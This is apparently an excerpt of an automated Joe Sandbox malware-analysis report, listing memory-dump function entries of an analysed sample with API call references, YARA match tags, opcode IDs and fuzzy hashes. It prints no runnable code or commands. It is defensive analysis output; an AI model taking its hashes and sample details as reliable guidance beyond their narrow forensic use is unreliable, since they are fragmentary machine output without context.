                                                                    • Source File: 00000000.00000002.4556473599.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4556389059.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4556473599.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .
                                                                    • API String ID: 0-248832578
                                                                    • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                    • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                                                    • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                    • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                                                    APIs
                                                                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                    • EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                    • String ID: lJD
                                                                    • API String ID: 1084509184-3316369744
                                                                    • Opcode ID: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                                                    • Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
                                                                    • Opcode Fuzzy Hash: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                                                    • Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44
                                                                    APIs
                                                                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                    • EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                    • String ID: lJD
                                                                    • API String ID: 1084509184-3316369744
                                                                    • Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                                                    • Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
                                                                    • Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                                                    • Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604
                                                                    APIs
                                                                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID: GetLocaleInfoEx
                                                                    • API String ID: 2299586839-2904428671
                                                                    • Opcode ID: 2d8ab5e4c08eb423885d267f31dc3d21c73ce0c4a0b39471804a4927225e8e03
                                                                    • Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
                                                                    • Opcode Fuzzy Hash: 2d8ab5e4c08eb423885d267f31dc3d21c73ce0c4a0b39471804a4927225e8e03
                                                                    • Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                                                    • Instruction ID: a89a86a7c059f2ce1b75669fee0c4fca3fa64158462c9470c468cddaecc71d09
                                                                    • Opcode Fuzzy Hash: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                                                    • Instruction Fuzzy Hash: FB025D71E002199BEF14CFA9D8806AEBBF1FF49324F26416AD819E7344D734AE41CB85
                                                                    APIs
                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00453326,?,?,00000008,?,?,004561DD,00000000), ref: 00453558
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExceptionRaise
                                                                    • String ID:
                                                                    • API String ID: 3997070919-0
                                                                    • Opcode ID: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                                                    • Instruction ID: ef9cfcefdd20db456822e604066c987cb5d00f1002a97bdaec88d2537339d9b1
                                                                    • Opcode Fuzzy Hash: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                                                    • Instruction Fuzzy Hash: 40B16C311106089FD715CF28C48AB657BE0FF053A6F258659EC9ACF3A2C739DA96CB44
                                                                    APIs
                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,1000B5BC,?,?,00000008,?,?,1000B25C,00000000), ref: 1000B7EE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4556473599.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4556389059.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4556473599.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionRaise
                                                                    • String ID:
                                                                    • API String ID: 3997070919-0
                                                                    • Opcode ID: 5385f7ee1153a66eb2669645b58237e3e0719d9079e030963b5c19e75e4dc3f3
                                                                    • Instruction ID: c899a2dc376e060411cab8954cdd4c29929d9ba6cfa71f030d59b99a2ca162da
                                                                    • Opcode Fuzzy Hash: 5385f7ee1153a66eb2669645b58237e3e0719d9079e030963b5c19e75e4dc3f3
                                                                    • Instruction Fuzzy Hash: 0DB16B31610A09CFE755CF28C486B647BE0FF453A4F25C658E89ACF2A5C735E982CB40
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0
                                                                    • API String ID: 0-4108050209
                                                                    • Opcode ID: 1f1efbfc6b98b7ff63776831a751ef1758ce1d1abb45475947e68a2c5420a09b
                                                                    • Instruction ID: aa2317f629b7fe23c078ec1ce6c5eb8ae6c7f7e5ba67e2b2e47e92e01b9ebfde
                                                                    • Opcode Fuzzy Hash: 1f1efbfc6b98b7ff63776831a751ef1758ce1d1abb45475947e68a2c5420a09b
                                                                    • Instruction Fuzzy Hash: A4126F32B083008BD714EF6AD851A1FB3E2BFCC758F15892EF585A7391DA34E9058B46
                                                                    APIs
                                                                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                      • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast$_free$InfoLocale_abort
                                                                    • String ID:
                                                                    • API String ID: 1663032902-0
                                                                    • Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                                                    • Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
                                                                    • Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                                                    • Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58
                                                                    APIs
                                                                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast$InfoLocale_abort_free
                                                                    • String ID:
                                                                    • API String ID: 2692324296-0
                                                                    • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                    • Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
                                                                    • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                    • Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698
                                                                    APIs
                                                                      • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(-0006D41D,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                                                                    • EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                    • String ID:
                                                                    • API String ID: 1272433827-0
                                                                    • Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                                                    • Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
                                                                    • Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                                                    • Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09
                                                                    APIs
                                                                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                    • EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                    • String ID:
                                                                    • API String ID: 1084509184-0
                                                                    • Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                                                    • Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
                                                                    • Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                                                    • Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00034B53,0043487A), ref: 00434B4C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                                                    • Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
                                                                    • Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                                                    • Instruction Fuzzy Hash:
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0
                                                                    • API String ID: 0-4108050209
                                                                    • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                    • Instruction ID: cdd912994a32e16cda9accbda93f1ea0618352901e275441ec4d65c4c105c2b3
                                                                    • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                    • Instruction Fuzzy Hash: 9C514771603648A7DF3489AB88567BF63899B0E344F18394BD882C73C3C62DED02975E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                                                    • Instruction ID: e4f6ca204f58efd2523fb0dbef6dba8f744ce0bfcff40a2940ff04dc0a880f4e
                                                                    • Opcode Fuzzy Hash: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                                                    • Instruction Fuzzy Hash: A841FB75A187558BC340CF29C58061BFBE1FFD8318F655A1EF889A3350D375E9428B86
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4556473599.0000000010016000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4556389059.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4556473599.0000000010001000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f12bac2ceacaba3709f449de7301e54826307763cc64d35c491f096f7cc92462
                                                                    • Instruction ID: 44f99013a838546abf86f75096a930c39f9ce457c7277da91ad5f6740c4fb7fb
                                                                    • Opcode Fuzzy Hash: f12bac2ceacaba3709f449de7301e54826307763cc64d35c491f096f7cc92462
                                                                    • Instruction Fuzzy Hash: 89628C316083958FD324DF28C48469ABBF1FF85384F154A2DE9E98B391E771D989CB42
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5da51411db3bde963f465f05a0d8b0dbce9b500299d5c90620e57fed4b77625f
                                                                    • Instruction ID: ecf94096385373c2e9f2c5c276bef480e2dc0267d4a411ba40625ecd8b408152
                                                                    • Opcode Fuzzy Hash: 5da51411db3bde963f465f05a0d8b0dbce9b500299d5c90620e57fed4b77625f
                                                                    • Instruction Fuzzy Hash: 7F323831D69F014DE7239A35C862336A289BFB73C5F15D737F816B5AAAEB28C4834105
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
